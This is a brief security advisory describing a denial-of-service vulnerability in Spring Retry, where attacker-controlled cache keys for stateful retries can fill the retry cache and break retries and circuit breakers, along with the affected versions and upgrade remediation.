Spring Retry Denial-of-Service Vulnerability via Cache Exhaustion in Stateful Retries

A denial-of-service vulnerability has been identified in Spring Retry versions 2.0.0 through 2.0.12 and 1.3.0 through 1.3.4. This issue arises when stateful retries are enabled, and the cache keys for these retries are controlled by the attacker. Exploitation involves sending a large number of unique requests that trigger failures, filling the application-wide stateful retry cache. Once the cache is full, it permanently rejects further updates, causing subsequent stateful retries and circuit breakers to fail.

Impact

Exploitation of this vulnerability leads to a denial-of-service condition, where the application fails to process stateful retries and circuit breaker functions, causing disruptions in the application's normal operation.

Remediation

Users of Spring Retry 2.0.x should upgrade to version 2.0.13 or 2.0.12.1 (Enterprise Support Only). Users of Spring Retry 1.3.x should upgrade to version 1.3.5 (Enterprise Support Only).